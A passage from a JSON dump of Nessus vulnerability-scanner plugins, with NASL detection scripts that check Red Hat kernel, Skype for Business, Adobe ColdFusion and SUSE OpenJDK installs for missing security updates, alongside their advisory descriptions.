script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-kdump-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-kdump-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-tools-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-tools-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-tools-libs-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:perf\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:perf-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:python-perf\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:python-perf-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7.6\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/12/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/12/12\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2019 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\", \"linux_alt_patch_detect.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\ninclude(\"ksplice.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^7\\.6([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 7.6\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nif (get_one_kb_item(\"Host/ksplice/kernel-cves\"))\n{\n rm_kb_item(name:\"Host/uptrack-uname-r\");\n cve_list = make_list(\"CVE-2019-9500\");\n if (ksplice_cves_check(cve_list))\n {\n audit(AUDIT_PATCH_INSTALLED, \"KSplice hotfix for RHSA-2019:4168\");\n }\n else\n {\n __rpm_report = ksplice_reporting_text();\n }\n}\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2019:4168\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security 
advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL7\", sp:\"6\", cpu:\"x86_64\", reference:\"bpftool-3.10.0-957.41.1.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", sp:\"6\", cpu:\"s390x\", reference:\"kernel-3.10.0-957.41.1.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", sp:\"6\", cpu:\"x86_64\", reference:\"kernel-3.10.0-957.41.1.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", sp:\"6\", reference:\"kernel-abi-whitelists-3.10.0-957.41.1.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", sp:\"6\", cpu:\"s390x\", reference:\"kernel-debug-3.10.0-957.41.1.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", sp:\"6\", cpu:\"x86_64\", reference:\"kernel-debug-3.10.0-957.41.1.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", sp:\"6\", cpu:\"s390x\", reference:\"kernel-debug-debuginfo-3.10.0-957.41.1.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", sp:\"6\", cpu:\"x86_64\", reference:\"kernel-debug-debuginfo-3.10.0-957.41.1.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", sp:\"6\", cpu:\"s390x\", reference:\"kernel-debug-devel-3.10.0-957.41.1.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", sp:\"6\", cpu:\"x86_64\", reference:\"kernel-debug-devel-3.10.0-957.41.1.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", sp:\"6\", cpu:\"s390x\", reference:\"kernel-debuginfo-3.10.0-957.41.1.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", sp:\"6\", cpu:\"x86_64\", reference:\"kernel-debuginfo-3.10.0-957.41.1.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", sp:\"6\", cpu:\"s390x\", reference:\"kernel-debuginfo-common-s390x-3.10.0-957.41.1.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", sp:\"6\", cpu:\"x86_64\", reference:\"kernel-debuginfo-common-x86_64-3.10.0-957.41.1.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", sp:\"6\", cpu:\"s390x\", reference:\"kernel-devel-3.10.0-957.41.1.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", sp:\"6\", cpu:\"x86_64\", 
reference:\"kernel-devel-3.10.0-957.41.1.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", sp:\"6\", reference:\"kernel-doc-3.10.0-957.41.1.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", sp:\"6\", cpu:\"s390x\", reference:\"kernel-headers-3.10.0-957.41.1.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", sp:\"6\", cpu:\"x86_64\", reference:\"kernel-headers-3.10.0-957.41.1.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", sp:\"6\", cpu:\"s390x\", reference:\"kernel-kdump-3.10.0-957.41.1.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", sp:\"6\", cpu:\"s390x\", reference:\"kernel-kdump-debuginfo-3.10.0-957.41.1.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", sp:\"6\", cpu:\"s390x\", reference:\"kernel-kdump-devel-3.10.0-957.41.1.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", sp:\"6\", cpu:\"x86_64\", reference:\"kernel-tools-3.10.0-957.41.1.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", sp:\"6\", cpu:\"x86_64\", reference:\"kernel-tools-debuginfo-3.10.0-957.41.1.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", sp:\"6\", cpu:\"x86_64\", reference:\"kernel-tools-libs-3.10.0-957.41.1.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", sp:\"6\", cpu:\"x86_64\", reference:\"kernel-tools-libs-devel-3.10.0-957.41.1.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", sp:\"6\", cpu:\"s390x\", reference:\"perf-3.10.0-957.41.1.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", sp:\"6\", cpu:\"x86_64\", reference:\"perf-3.10.0-957.41.1.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", sp:\"6\", cpu:\"s390x\", reference:\"perf-debuginfo-3.10.0-957.41.1.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", sp:\"6\", cpu:\"x86_64\", reference:\"perf-debuginfo-3.10.0-957.41.1.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", sp:\"6\", cpu:\"s390x\", reference:\"python-perf-3.10.0-957.41.1.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", sp:\"6\", cpu:\"x86_64\", reference:\"python-perf-3.10.0-957.41.1.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", sp:\"6\", 
cpu:\"s390x\", reference:\"python-perf-debuginfo-3.10.0-957.41.1.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", sp:\"6\", cpu:\"x86_64\", reference:\"python-perf-debuginfo-3.10.0-957.41.1.el7\")) flag++;\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"bpftool / kernel / kernel-abi-whitelists / kernel-debug / etc\");\n }\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2019-12-13T09:19:24", "bulletinFamily": "scanner", "description": "The Microsoft Skype for Business installation on the remote host is missing a security update. It is, therefore,\naffected by a spoofing vulnerability because the Skype for Business Server does not properly sanitize a specially\ncrafted request. An authenticated, remote attacker can exploit the vulnerability by sending a specially crafted request\nto an affected server. An attacker who successfully exploits this vulnerability can then perform cross-site scripting\nattacks on affected systems and run scripts in the security context of the current user. For the vulnerability to be\nexploited, a user must click a specially crafted URL that takes the user to a targeted Skype for Business site.", "modified": "2019-12-12T00:00:00", "published": "2019-12-12T00:00:00", "id": "SMB_NT_MS19_DEC_SKYPE.NASL", "href": "https://www.tenable.com/plugins/nessus/132020", "title": "Security Updates for Microsoft Skype for Business (December 2019)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. 
The text\n# itself is copyright (C) Microsoft Corporation.\n#\ninclude('compat.inc');\n\nif (description)\n{\n script_id(132020);\n script_version(\"1.1\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2019/12/12\");\n\n script_cve_id(\"CVE-2019-1490\");\n script_xref(name:\"MSKB\", value:\"4534761\");\n script_xref(name:\"MSFT\", value:\"MS19-4534761\");\n script_xref(name:\"IAVA\", value:\"2019-A-0457\");\n\n script_name(english:\"Security Updates for Microsoft Skype for Business (December 2019)\");\n script_summary(english:\"Checks for Microsoft security updates.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The Microsoft Skype for Business installation on the remote host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"The Microsoft Skype for Business installation on the remote host is missing a security update. It is, therefore,\naffected by a spoofing vulnerability because the Skype for Business Server does not properly sanitize a specially\ncrafted request. An authenticated, remote attacker can exploit the vulnerability by sending a specially crafted request\nto an affected server. An attacker who successfully exploits this vulnerability can then perform cross-site scripting\nattacks on affected systems and run scripts in the security context of the current user. 
For the vulnerability to be\nexploited, a user must click a specially crafted URL that takes the user to a targeted Skype for Business site.\");\n # https://support.microsoft.com/en-us/help/4534761/description-of-the-security-update-for-skype-for-business-server-2019\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?f618bbd7\");\n script_set_attribute(attribute:\"solution\", value:\n\"Microsoft has released KB4534761 to address this issue.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:P/A:N\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2019-1490\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/12/10\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/12/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/12/12\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:microsoft:skype_for_business\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2019 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"office_installed.nasl\",\"microsoft_lync_server_installed.nasl\",\"smb_hotfixes.nasl\",\"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('audit.inc');\ninclude('install_func.inc');\n\nreport = '';\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\nget_kb_item_or_exit('SMB/Registry/Enumerated', exit_code:1);\n\nbulletin = 'MS19-12';\napp = 'Microsoft Lync';\ninstalls = get_installs(app_name:app);\nfix_ver = '7.0.2046.151';\nforeach install (installs[1])\n{\n version = install['version'];\n\n if (ver_compare(ver:version, minver:'7.0', fix:fix_ver, strict:FALSE) < 0 && 'Server' >< install['Product'])\n {\n app_label = 'Skype for Business Server 2019';\n report +=\n '\\n\\n Product : ' + app_label +\n '\\n Installed version : ' + version +\n '\\n Fixed version : ' + fix_ver;\n }\n}\n\nif (empty(report))\n audit(AUDIT_HOST_NOT, 'affected');\n\nreplace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\nsecurity_report_v4(severity:SECURITY_WARNING, port:0, extra:report);\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2019-12-13T06:46:37", "bulletinFamily": "scanner", "description": "The version of Adobe ColdFusion installed on the remote Windows host is prior to 2018.x update 7. 
It is, therefore,\naffected by a vulnerability as referenced in the APSB19-58 advisory.\n\n - Insecure inherited permissions of default installation\n directory potentially leading to Privilege Escalation\n (CVE-2019-8256)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application", "modified": "2019-12-02T00:00:00", "published": "2019-12-12T00:00:00", "id": "COLDFUSION_WIN_APSB19-58.NASL", "href": "https://www.tenable.com/plugins/nessus/132019", "title": "Adobe ColdFusion < 2018.x < 2018u7 Vulnerability (APSB19-58)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(132019);\n script_version(\"1.1\");\n script_cvs_date(\"Date: 2019/12/12\");\n\n script_cve_id(\"CVE-2019-8256\");\n script_xref(name:\"IAVA\", value:\"2019-A-0347\");\n\n script_name(english:\"Adobe ColdFusion < 2018.x < 2018u7 Vulnerability (APSB19-58)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"A web-based application running on the remote host is affected by a vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Adobe ColdFusion installed on the remote Windows host is prior to 2018.x update 7. 
It is, therefore,\naffected by a vulnerability as referenced in the APSB19-58 advisory.\n\n - Insecure inherited permissions of default installation\n directory potentially leading to Privilege Escalation\n (CVE-2019-8256)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://helpx.adobe.com/security/products/coldfusion/apsb19-58.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update to Adobe ColdFusion version 2018 update 7 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2019-8256\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/12/10\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/12/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/12/12\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:adobe:coldfusion\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2019 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"coldfusion_win_local_detect.nasl\");\n script_require_keys(\"SMB/coldfusion/instance\");\n script_require_ports(139, 445);\n\n exit(0);\n}\n\ninclude('audit.inc');\ninclude('coldfusion_win.inc');\ninclude('global_settings.inc');\ninclude('misc_func.inc');\n\ninstances = get_coldfusion_instances(); # this exits if it fails\n\n# Check the hotfixes and cumulative hotfixes\n# installed for each instance of ColdFusion.\ninstance_info = make_list();\n\nforeach name (keys(instances))\n{\n info = NULL;\n ver = instances[name];\n\nif (ver == '2018.0.0')\n {\n info = check_jar_chf(name, 7);\n }\n if (!isnull(info))\n instance_info = make_list(instance_info, info);\n}\n\nif (max_index(instance_info) == 0)\n audit(AUDIT_INST_VER_NOT_VULN, 'Adobe ColdFusion');\n\nport = get_kb_item('SMB/transport');\nif (!port)\n port = 445;\n\nreport =\n '\\n' + 'Nessus detected the following unpatched instances :' +\n '\\n' + join(instance_info, sep:'\\n') +\n '\\n';\n\nsecurity_report_v4(port:port, extra:report, severity:SECURITY_WARNING);\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2019-12-13T09:43:22", "bulletinFamily": "scanner", "description": "This update for java-1_8_0-openjdk (jdk8u232/icedtea 3.14.0) fixes the\nfollowing issues :\n\nSecurity issues fixed (bsc#1154212) :\n\nCVE-2019-2933: Windows file handling redux\n\nCVE-2019-2945: Better socket support\n\nCVE-2019-2949: Better Kerberos ccache handling\n\nCVE-2019-2958: Build Better Processes\n\nCVE-2019-2964: Better support for patterns\n\nCVE-2019-2962: Better Glyph Images\n\nCVE-2019-2973: Better pattern compilation\n\nCVE-2019-2975: Unexpected exception in jjs\n\nCVE-2019-2978: Improved handling of jar files\n\nCVE-2019-2981: Better Path supports\n\nCVE-2019-2983: Better serial attributes\n\nCVE-2019-2987: Better rendering of native glyphs\n\nCVE-2019-2988: Better Graphics2D drawing\n\nCVE-2019-2989: Improve TLS connection support\n\nCVE-2019-2992: Enhance 
font glyph mapping\n\nCVE-2019-2999: Commentary on Javadoc comments\n\nCVE-2019-2894: Enhance ECDSA operations (bsc#1152856)\n\nBug fixes: Fixed build failuers on ARM (bsc#1138529).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "modified": "2019-12-02T00:00:00", "published": "2019-12-12T00:00:00", "id": "SUSE_SU-2019-3238-1.NASL", "href": "https://www.tenable.com/plugins/nessus/132004", "title": "SUSE SLED15 / SLES15 Security Update : java-1_8_0-openjdk (SUSE-SU-2019:3238-1)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from SUSE update advisory SUSE-SU-2019:3238-1.\n# The text itself is copyright (C) SUSE.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(132004);\n script_version(\"1.1\");\n script_cvs_date(\"Date: 2019/12/12\");\n\n script_cve_id(\"CVE-2019-2894\", \"CVE-2019-2933\", \"CVE-2019-2945\", \"CVE-2019-2949\", \"CVE-2019-2958\", \"CVE-2019-2962\", \"CVE-2019-2964\", \"CVE-2019-2973\", \"CVE-2019-2975\", \"CVE-2019-2978\", \"CVE-2019-2981\", \"CVE-2019-2983\", \"CVE-2019-2987\", \"CVE-2019-2988\", \"CVE-2019-2989\", \"CVE-2019-2992\", \"CVE-2019-2999\");\n\n script_name(english:\"SUSE SLED15 / SLES15 Security Update : java-1_8_0-openjdk (SUSE-SU-2019:3238-1)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SUSE host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update for java-1_8_0-openjdk (jdk8u232/icedtea 3.14.0) fixes the\nfollowing issues :\n\nSecurity issues fixed (bsc#1154212) :\n\nCVE-2019-2933: Windows file handling redux\n\nCVE-2019-2945: Better 
socket support\n\nCVE-2019-2949: Better Kerberos ccache handling\n\nCVE-2019-2958: Build Better Processes\n\nCVE-2019-2964: Better support for patterns\n\nCVE-2019-2962: Better Glyph Images\n\nCVE-2019-2973: Better pattern compilation\n\nCVE-2019-2975: Unexpected exception in jjs\n\nCVE-2019-2978: Improved handling of jar files\n\nCVE-2019-2981: Better Path supports\n\nCVE-2019-2983: Better serial attributes\n\nCVE-2019-2987: Better rendering of native glyphs\n\nCVE-2019-2988: Better Graphics2D drawing\n\nCVE-2019-2989: Improve TLS connection support\n\nCVE-2019-2992: Enhance font glyph mapping\n\nCVE-2019-2999: Commentary on Javadoc comments\n\nCVE-2019-2894: Enhance ECDSA operations (bsc#1152856)\n\nBug fixes: Fixed build failuers on ARM (bsc#1138529).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1138529\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1152856\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1154212\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2019-2894/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2019-2933/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2019-2945/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2019-2949/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2019-2958/\"\n );\n script_set_attribute(\n 
attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2019-2962/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2019-2964/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2019-2973/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2019-2975/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2019-2978/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2019-2981/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2019-2983/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2019-2987/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2019-2988/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2019-2989/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2019-2992/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2019-2999/\"\n );\n # https://www.suse.com/support/update/announcement/2019/suse-su-20193238-1/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?44ec3e6c\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"To install this SUSE Security Update use the SUSE recommended\ninstallation methods like YaST online_update or 'zypper patch'.\n\nAlternatively you can run the command listed for your product :\n\nSUSE Linux Enterprise Module for Packagehub Subpackages 15:zypper in\n-t patch SUSE-SLE-Module-Packagehub-Subpackages-15-2019-3238=1\n\nSUSE Linux Enterprise Module for Open Buildservice 
Development Tools\n15-SP1:zypper in -t patch\nSUSE-SLE-Module-Development-Tools-OBS-15-SP1-2019-3238=1\n\nSUSE Linux Enterprise Module for Open Buildservice Development Tools\n15:zypper in -t patch\nSUSE-SLE-Module-Development-Tools-OBS-15-2019-3238=1\n\nSUSE Linux Enterprise Module for Legacy Software 15-SP1:zypper in -t\npatch SUSE-SLE-Module-Legacy-15-SP1-2019-3238=1\n\nSUSE Linux Enterprise Module for Legacy Software 15:zypper in -t patch\nSUSE-SLE-Module-Legacy-15-2019-3238=1\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:P/A:P\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:N/A:N\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:java-1_8_0-openjdk\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:java-1_8_0-openjdk-accessibility\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:java-1_8_0-openjdk-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:java-1_8_0-openjdk-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:java-1_8_0-openjdk-demo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:java-1_8_0-openjdk-demo-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:java-1_8_0-openjdk-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:java-1_8_0-openjdk-devel-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:java-1_8_0-openjdk-headless\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:java-1_8_0-openjdk-headless-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:java-1_8_0-openjdk-src\");\n script_set_attribute(attribute:\"cpe\", 
value:\"cpe:/o:novell:suse_linux:15\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/10/16\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/12/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/12/12\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nos_ver = pregmatch(pattern: \"^(SLE(S|D)\\d+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"SUSE\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(SLED15|SLES15)$\", string:os_ver)) audit(AUDIT_OS_NOT, \"SUSE SLED15 / SLES15\", \"SUSE \" + os_ver);\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SUSE \" + os_ver, cpu);\n\nsp = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(sp)) sp = \"0\";\nif (os_ver == \"SLES15\" && (! preg(pattern:\"^(0|1)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLES15 SP0/1\", os_ver + \" SP\" + sp);\nif (os_ver == \"SLED15\" && (! 
